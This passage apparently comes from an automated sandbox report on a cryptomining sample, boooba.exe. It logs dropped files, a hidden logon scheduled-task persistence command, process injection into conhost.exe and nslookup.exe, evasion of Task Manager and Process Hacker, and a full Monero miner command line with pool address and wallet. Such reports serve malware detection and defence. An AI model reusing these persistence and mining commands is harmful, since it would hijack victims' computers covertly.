Source: C:\Windows\System32\nslookup.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\nslookup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: boooba.exe Static file information: File size 2234368 > 1048576
Source: boooba.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x21fc00

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to behavior
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\IOAshdohSha.exe Jump to dropped file
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Windows\System32\conhost.exe File created: C:\Users\user\IOAshdohSha.exe Jump to dropped file
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\nslookup.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\nslookup.exe System information queried: FirmwareTableInformation
Source: nslookup.exe, 0000000D.00000002.2902391217.0000019A4A588000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSHACKER.EXE
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [0M%S STOPPING IDLE, SETTING MAX CPU TO: %D%S STARTING IDLE, SETTING MAX CPU TO: %DTASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE%S
Source: conhost.exe, 00000009.00000003.1778364513.0000013CBC45D000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782171158.0000013CBC451000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780152081.0000013CBC45C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1780613340.0000013CBC456000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1786769697.0000013CBC455000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1771637621.0000013CBC45A000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1777881414.0000013CBC454000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776373079.0000013CBC45E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1776847391.0000013CBC452000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1782890833.0000013CBC45F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000009.00000003.1770961178.0000013CBC453000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: TASKMGR.EXE,PROCESSHACKER.EXE,PERFMON.EXE,PROCEXP.EXE,PROCEXP64.EXE
Source: C:\Windows\System32\conhost.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\conhost.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\boooba.exe Memory allocated: C:\Windows\System32\conhost.exe base: 15759250000 protect: page execute and read and write
Source: C:\Users\user\IOAshdohSha.exe Memory allocated: C:\Windows\System32\conhost.exe base: 13CA14E0000 protect: page execute and read and write
Source: C:\Users\user\IOAshdohSha.exe Memory allocated: C:\Windows\System32\conhost.exe base: 1E311770000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory allocated: C:\Windows\System32\conhost.exe base: 29965300000 protect: page execute and read and write
Source: C:\Users\user\Desktop\boooba.exe Thread created: C:\Windows\System32\conhost.exe EIP: 59250000
Source: C:\Users\user\IOAshdohSha.exe Thread created: C:\Windows\System32\conhost.exe EIP: A14E0000
Source: C:\Users\user\IOAshdohSha.exe Thread created: C:\Windows\System32\conhost.exe EIP: 11770000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Thread created: C:\Windows\System32\conhost.exe EIP: 65300000
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtCreateThreadEx: Direct from: 0x401A17
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtWriteVirtualMemory: Direct from: 0x401D57
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtProtectVirtualMemory: Direct from: 0x401DD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtClose: Direct from: 0x401CD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe NtAllocateVirtualMemory: Direct from: 0x401D97
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 6288
Source: C:\Windows\System32\conhost.exe Thread register set: target process: 5480
Source: C:\Users\user\Desktop\boooba.exe Memory written: C:\Windows\System32\conhost.exe base: 15759250000
Source: C:\Users\user\IOAshdohSha.exe Memory written: C:\Windows\System32\conhost.exe base: 13CA14E0000
Source: C:\Users\user\IOAshdohSha.exe Memory written: C:\Windows\System32\conhost.exe base: 1E311770000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140000000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140001000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140367000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 1404A0000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140753000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140775000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140776000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140777000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 140779000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 14077B000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 14077C000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 14077D000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 59CFC77010
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Memory written: C:\Windows\System32\conhost.exe base: 29965300000
Source: C:\Windows\System32\conhost.exe Memory written: C:\Windows\System32\nslookup.exe base: 26087A5010
Source: C:\Users\user\Desktop\boooba.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\Desktop\boooba.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "IOAshdohSha" /tr "C:\Users\user\IOAshdohSha.exe"
Source: C:\Users\user\IOAshdohSha.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\IOAshdohSha.exe C:\Users\user\IOAshdohSha.exe
Source: C:\Users\user\IOAshdohSha.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\IOAshdohSha.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\nslookup.exe C:\Windows/System32\nslookup.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG --pass= --cpu-max-threads-hint=100
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\nslookup.exe c:\windows/system32\nslookup.exe --cinit-find-x -b --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu1.nanopool.org:10300 --user=45dxysg6jefipo688i2dkjfnbpbgzcjxpmylrn8trmpsyqh37gdzkmehpjxrvfxabzf32ifsrrlqekoa1zsiskrjnyjydqg --pass= --cpu-max-threads-hint=100
Source: C:\Windows\System32\conhost.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\nslookup.exe Code function: 12_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 12_2_000000014031010C